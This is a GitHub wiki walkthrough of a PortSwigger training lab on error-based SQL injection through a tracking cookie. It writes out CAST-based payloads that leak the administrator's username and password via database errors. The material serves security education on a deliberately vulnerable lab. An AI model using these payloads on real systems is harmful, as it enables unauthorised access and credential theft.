Visible error‐based SQL injection - KA4KA4/PortSwigger-SQL-injection-Labs GitHub Wiki
hello
today we are going to talk about other type of SQL Injection Vulnerability
The application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.
so let's start the lab
access the lab and intercept request and send request to repeater.
now Trying to make an error on the application. in real life testing we try test every parameter in application meaning that maybe vulnerable for any vulnerability not just SQL Injection
when send regular request without any quotation:
it's regular response. now we need to break syntax to check error because error indicate that there is SQL injection.
now we get error. this error indicates that this application maybe vulnerable to SQL Injection.
- note: two statement error disappear when try close query with double quote ''
and when delete one quote and add comment as following?
there is no longer receive an error. This suggests that the query is now handling and valid.
after testing and release the query start with ' and end with -- we can crate our query inside these (' --)
we can Extracting data via visible error messages meaning that we can potentially elicit error messages that leak sensitive data returned by your malicious query.
-
burp suite cheat sheet facilitate process and collect the most of queries for SQL Injection check this link https://portswigger.net/web-security/sql-injection/cheat-sheet
-
after checking link we will use the query as following:
now use this query:
' AND CAST((SELECT password from users limit 1) AS int)--
- explain: first break the query with single quote then used cast to select a password from table users and use a limit 1 option cause I want display one number of rows that are returned by a query. This is useful for situations where a large number of rows are returned. then use AS int because the CAST function which is converting the password value retrieved from the users table to an integer data type. finish the query by add -- to tell database ending of query.
-
Error (ERROR: argument of AND must be type Boolean, not type integer) indicate that AND must be type Boolean. what that mean?
-
A Boolean expression is an expression used in computer programming that produces a Boolean value which is either true or false, when evaluate. the value will be involve Boolean operators such as AND, OR, and NOT, and relational operators such as equals, less than, and greater than
- after detect error the next step is edit Boolean expression in the query. meaning that we will use comparison operator this mean adding equal (=) why? for testing if the manipulated SQL statement is valid. query will be as following:
' AND 1=CAST((SELECT 1) AS int)--
-
Explain: first break the query with ' then add Boolean condition with and then use 1=CAST to convert a specified value into an integer data type and for testing if the manipulated SQL statement is valid. then use SELECT 1 because this will be Our request from the database will be inside the parentheses will change it later. and use "As int" to inform the database that the value returned in the CAST is an integer,
-
now use the query and see what happening:
error disappear
after detect valid query the next step is extracting username column FROM users table. it's the same previous query just wil change what Between the brackets will be as following:
' AND 1=CAST((SELECT username FROM users) AS int)--
- we get another error
this error because we didn't detect how many Raws returned. we will use LIMIT 1 to return the first Raws. the query will be as following :
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
this error indicate the length of character that enters the database is too long. we will try remove token cookie maybe backend not valid if the cookie existing in request or not. send request as following :
as we expected . backend send request to database without check cookie token. username is administrator
now change the between brackets replace with username with password to get passord of administrator user . the query will be as following :
now we have password of user administrator. login to solve the lab :
thank you 🥇